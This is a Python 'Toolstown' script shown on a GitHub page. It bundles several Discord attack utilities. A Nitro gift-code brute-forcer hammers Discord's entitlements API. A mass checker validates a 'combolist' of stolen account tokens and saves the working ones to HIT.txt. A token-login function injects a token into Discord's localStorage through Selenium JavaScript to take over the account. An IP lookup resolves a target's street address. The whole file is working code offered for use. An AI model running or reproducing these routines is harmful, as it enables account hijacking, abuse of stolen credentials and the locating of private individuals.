-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmain.py
177 lines (144 loc) · 6.45 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
#Importent Imports
from pystyle import System
from requests import get
import requests
from os import system
from colorama import Fore, init, Style
from selenium import webdriver
#Change The Console Title
mytitle = "1337 - Toolstown"
system("title "+mytitle)
#Only Change This To Your Banner
banner = f"""{Fore.RED}
██╗██████╗ ██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗
███║╚════██╗╚════██╗╚════██║ ╚══██╔══╝██╔═══██╗██╔═══██╗██║
╚██║ █████╔╝ █████╔╝ ██╔╝ ██║ ██║ ██║██║ ██║██║
██║ ╚═══██╗ ╚═══██╗ ██╔╝ ██║ ██║ ██║██║ ██║██║
██║██████╔╝██████╔╝ ██║ ██║ ╚██████╔╝╚██████╔╝███████╗
╚═╝╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝{Style.RESET_ALL}
{Fore.MAGENTA}By Smash#1337{Style.RESET_ALL}
"""
# for Time Show Like [12:33]
import time
import datetime
def update_time():
now = datetime.datetime.now()
current_time = now.strftime("%H:%M")
return current_time
#Main Menu
def mainanswer():
System.Clear()
print(f'{banner}')
print('\n')
print(f' [1] > {Fore.RED}DC Account Checker{Style.RESET_ALL} [3] > {Fore.MAGENTA}Nitro Generator{Style.RESET_ALL}')
print(f' [2] > {Fore.RED}IP Lockup{Style.RESET_ALL} [4] > {Fore.MAGENTA}Token Login{Style.RESET_ALL}')
print('\n')
print('\n')
answer = input('\033[1;00m[\033[91m>\033[1;00m]\033[91m\033[00m Choose : ')
if answer == '1':
Maine()
if answer == '2':
ip()
if answer == '3':
nitro()
if answer == '4':
login()
else:
print('Incorrect selection, please choose a number')
mainanswer()
#Nitro Genarator
def nitro():
import random, string, requests
System.Clear()
print(banner)
print()
f=open("Valid Nitro.txt", "w", encoding='utf-8')
while True:
code = ('').join(random.choices(string.ascii_letters + string.digits, k=16))
r = requests.get(f"https://discordapp.com/api/v6/entitlements/gift-codes/{code}?with_application=false&with_subscription_plan=true")
if r.status_code == 200:
print(f"[{update_time()}] {Fore.GREEN}[+{Fore.RESET} discord.gift/{code}")
f.write(f"discord.gift/{code}\n")
else:
print(f"[{update_time()}] {Fore.RED}[-]{Fore.RESET} discord.gift/{code}")
#Token Login via Crhome
def login():
System.Clear()
token = input("Token Here > ")
print(banner)
print()
opts = webdriver.ChromeOptions()
opts.add_experimental_option("detach", True)
driver = webdriver.Chrome("assets/chromedriver.exe", options=opts)
script = """
function login(token) {
setInterval(() => {
document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
}, 50);
setTimeout(() => {
location.reload();
}, 2500);
}
"""
driver.get("https://discordapp.com/login")
driver.execute_script(script + f'\nlogin("{token}")')
print(f'{Fore.GREEN} Wait 10 Sec ')
mainanswer()
#Simple IP Lookup
def ip():
System.Clear()
print(banner)
print()
ip = input("\nEnter IP > ")
try:
getip = requests.get(url = f"https://geo.leadboxer.com/GeoIpEngine/{ip}?jsonp")
data = getip.json()
req2 = requests.get(url ="https://stevemorse.org/jcal/proxycode.php?&noCacheIE=1650908121322")
dat = req2.text
callback = dat[14:][:7]
print()
print(Fore.RED + "Country: " + data['countryName'])
print(Fore.LIGHTRED_EX + "Continent: " + data['continent'])
print(Fore.LIGHTCYAN_EX + "Postal Code: " + data['postalCode'])
print(Fore.CYAN + "Latitude: " + data['latitude'])
print(Fore.BLUE + "Longitude: " + data['longitude'])
print(Fore.LIGHTGREEN_EX + "City: " + data['city'])
lat = data['latitude']
lon = data['longitude']
req3 = requests.get(url = f"https://stevemorse.org/jcal/latlonlocal.php?cookie=&hidden=&doextra=&code={callback}&protocol=https%3A&time=1650908121321&addr2latlon=0&address=&city=&state=&zip=&country=US&latlon2addr=1&latitude={lat}4&longitude={lon}")
source = req3.text
left = "<br><br><i>MapQuest</i><br>"
right = "<br><br><br><img src"
print(Fore.GREEN + "Adress: " + source[source.index(left)+len(left):source.index(right)])
input("\nPress enter to exit...")
except:
print(Fore.LIGHTRED_EX + "\nFailed... Try again !")
input("\nPress enter to exit...")
mainanswer()
def MassCheck(combolist):
System.Clear()
print(banner)
print()
with open(combolist , 'r') as f:
content = f.read().split('\n')
File = open("HIT.txt" , 'w')
for token in content:
mass = get("https://discordapp.com/api/v9/users/@me?verified", headers={"authorization": token}).status_code
if mass == 200:
print(f"[{update_time()}] {Fore.GREEN}[+] {Fore.RESET}{token} ",)
File.write(token+ '\n')
if mass == 401:
print(f"[{update_time()}] {Fore.RED}[-]{Fore.RESET} {token}")
print()
System.Clear()
print(banner)
print(f"[{update_time()}] {Fore.YELLOW}[+]{Fore.RESET} Checking Finished Valid Token are in HIT.txt")
print(f"[{update_time()}] {Fore.YELLOW}[~]{Fore.RESET} By Smash#1337 & TeamGambo - Mike#1337")
mainanswer()
def Maine():
System.Clear()
print(banner)
print()
combolist = input(f"{Fore.YELLOW}[~] {Fore.RESET}Drag The Path of Your ComboList > ")
MassCheck(combolist)
mainanswer()